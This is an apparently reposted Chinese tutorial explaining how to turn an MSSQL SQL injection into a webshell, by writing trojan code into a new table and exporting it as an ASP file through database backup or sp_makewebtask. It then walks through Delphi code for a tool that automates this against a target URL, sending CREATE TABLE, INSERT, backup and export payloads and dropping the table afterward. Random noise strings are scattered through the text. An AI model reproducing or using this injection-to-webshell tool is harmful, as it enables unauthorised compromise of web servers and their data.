SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
: T: r, e6 b9 @$ gN.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
: E/ C) \1 f# W% _) r2 s  H分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
: |8 y+ p5 O9 w! c3 {再来看看CZY的方法吧。
3 D9 R0 ^8 P% M* L$ f& vCZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
) A3 K8 L- z; F$ q, g- o/ o3 X+ K二．利用DELPHI去实现功能的前言
原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。

! W" a' d& j+ |0 S9 g' k% g: `8 f7 ~三．如何利用DELPHI得到WEBSHELL。
2 A0 ]8 D! S" y  d* ~( k' Y6 y程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
/ u( F: N' x" t1 T! [( M首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：


, [9 S/ F, b+ Q& ]
现在来写程序了。
& z: l9 o1 o' O3 i* J2 I$ H我们首先定义一个RECORD。
如下：
1 f; Z* s& m9 m' L! I2 U, t4 kType
# l3 F, C6 I( l# _" ySetOption = Record
TableName : String; //用来保存要创建的表名.
- A5 @7 L" @, K: P1 n7 W% W7 _FieldName : String; //用来保存要创建的字段名.
% A2 b+ ~& G3 D' N1 }8 _4 {FiledType : String; //用来保存创建的字段名类型.
End;
5 W1 w& V, K% {  e9 SFiledType字段类型的值是以下类型的一种：
  k6 b6 e6 q; I5 J8 k$ YBigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
0 Q3 M$ b* N! ], O* w* bSmallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
再定义一个全局变量：
Var
ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
代码如下：
procedure TMainForm.FormCreate(Sender: TObject);
9 X6 }! y, l% ebegin
9 s$ t8 X) m1 v3 t" `sOption.TableName :='cyfd'
& t. @% q( }9 \0 A& c7 p' asOption.FieldName :='gmemo'
$ b, n4 o5 ~3 H# z' JsOption.FiledType :='text'
; |- p* E$ G' X6 u/ K  mend;
现在我们添加开始执行命令的代码。
先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
- W, S% x' I# J. W9 U5 w' [创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
( G( p! c7 v5 a3 |5 R& j在程序开始执行前,我们得先检查一下用户的输入
* ~  s$ W% m3 K# ]定义一个Checkinput函数.
) a1 O7 Z" e" V# y* u9 S2 |+ w如下：
Function CheckInput : Boolean;
. \" X3 a8 q# o4 UBegin
Result := False;
if Trim(urlet.Text) = '' then
Begin
Application.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
- }2 D  w; t$ T! JExit;
# u! ?2 J# q+ p$ j) A! ZEnd;
if Trim(ShellPathET.Text) = '' then
Begin
5 `) X8 w) O# D% m/ p- DApplication.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
Exit;
4 }/ f- g9 C4 y+ i9 E% xEnd;
IF DefBDoor.Checked then
( p  [! F  S* h/ nBegin
if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
4 a! c5 p) c  O( ?3 N, t3 G4 WBegin
/ Z+ i( ]" ^, Z7 s6 b$ m0 p$ CApplication.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
Exit;
+ A. h0 S# }: }3 ?End;
End
Else
4 S- G0 _. N2 R: A; ~) B& mif Not FileExists(CustomBdoorET.Text) then
( B: I: G5 d1 t! ~: Y% wBegin
+ Q3 L% j) N. z' S0 D$ CApplication.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
Exit;
% @9 {% W- t, y1 ]$ U$ Z% a9 S* wEnd;
3 h1 h2 p% L. j/ a1 b0 S/ cResult := True;
End;
5 x7 O. l* X. P在最开始加入:
; t6 T- x' Z% V8 Y, nIF Not CheckInput then Exit; //如果输入不合法就退出过程.
好了，如果用户输入没什么错，我们就来下面的代码。
首先我们把IsStop设为假。创建BdoorList。
BDoorList := TstringList.Create;
再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
代码如下：
6 w: `7 N) ^4 `1 MBDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
# y# I0 f, Q& C, t/ N+ VBDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
4 o! ?6 C4 z, a2 g2 h* U! W接下来.我们就提交建表的功能了.
. v6 w6 R; \5 `9 E+ Z7 BMemo.Lines.Add('建表...');
+ Z( J6 Q3 a  y) Z! k$ }Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
4 d- l' g# K6 }* c9 G# {这样我们就创建了一个表。然后.我们向表中加记录:
代码如下:
Memo.Lines.Add('加数据...');
' K' d1 ?. w; k7 j; }Memo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
Begin
4 Q, ^# ]' I% a" o- X  B& vIF IsStop then //这里如果点了停止按纽程序将终止任务.
Begin
BDoorList.Free;
Exit;
' `2 j$ h% Q/ D( Z# BEnd; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
4 K( Q) P& s; j1 v% T, R0 oMemo.Lines.Add('Add Line '+Inttostr(i+1));
End;
现在就是导出数据生成木马了.
Memo.Lines.Add('导出数据...');
) i! ]  D0 H) nMemo.Lines.Add('');
IF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
; V  ~( V9 ^1 V1 \NMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
Else //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
) J$ {# J8 h6 l! N! Q3 t6 y这样我们的任务就完成了。下面来释放变量.
5 ]8 d! U5 Q( u+ {5 G! t0 S. HBDoorList.Free;
再来向停止按纽中添加点击事件：
4 L" P+ u: ?/ f2 J! S1 B. E$ n' V一行代码就行了：IsStop := True;
到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
/ O1 I7 O9 [. S第一个名称为：TableNameET //保用户输入的存临时表
# U4 D$ s" p3 r3 |6 J8 e$ R第二个名称为：FieldNameET //用来保存用户输入的字段名.
再添加一个Combobox　//用来保存用户所选的字段类型值.
名称：FieldTypeCombox
OK.界面如下：

/ d) l3 @) F. y. Z7 U5 f, X代码如下:
8 n/ N. @- f, t  h定义一个过程,主表单好调用这个设置。
Procedure ShowSet;
Begin
Application.CreateForm(TSetForm,SetForm);
With SetForm do
Begin
TableNameET.Text := sOption.TableName;
' h, j6 W7 N0 }# j  i7 B7 iFieldNameET.Text := sOption.FieldName;
& I* Q3 C/ W" o8 @, GFieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
+ S3 y& e+ B+ p& s: B! hEnd;
1 W  D. J% y: B; Y9 ~" W& L. e$ MSetForm.ShowModal;
$ ]" _, o" \  x' C# ?SetForm.Free;
End;
在主表单中设置的点击事件中添加上showset过程就行了。
下面就是点击确定的代码了。
IF CheckInput then
Begin
/ x# v, A& R1 a, `sOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
( N  D0 U. O0 u7 P3 x- f' bsOption.FiledType := FieldTypeCombox.Text;
5 i) R. N- X1 s  }Close;
- B3 C7 m  ~% b/ ^End;
这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
* X7 y0 x$ m5 b$ |4 W7 E' }, P8 w1 o代码如下:
Function CheckInput : Boolean;
" r/ Y  k% [( @! y$ s2 a+ @, i1 fBegin
Result := False;
IF Trim(TableNameET.Text)='' then
  x+ c1 `: G3 ], |Begin
Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
' r3 X- ?+ G5 M. M4 O# J2 YExit;
End;
IF Trim(FieldNameET.Text)='' then
Begin
7 e; n% g# Y" R- xApplication.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
( w- b! x+ Z  yExit;
# l* J4 @0 A7 p$ B! ]; N' HEnd;
Result := True;
+ K/ ^4 g  Q  e; K: I: |End;
到这里程序就完了。</P>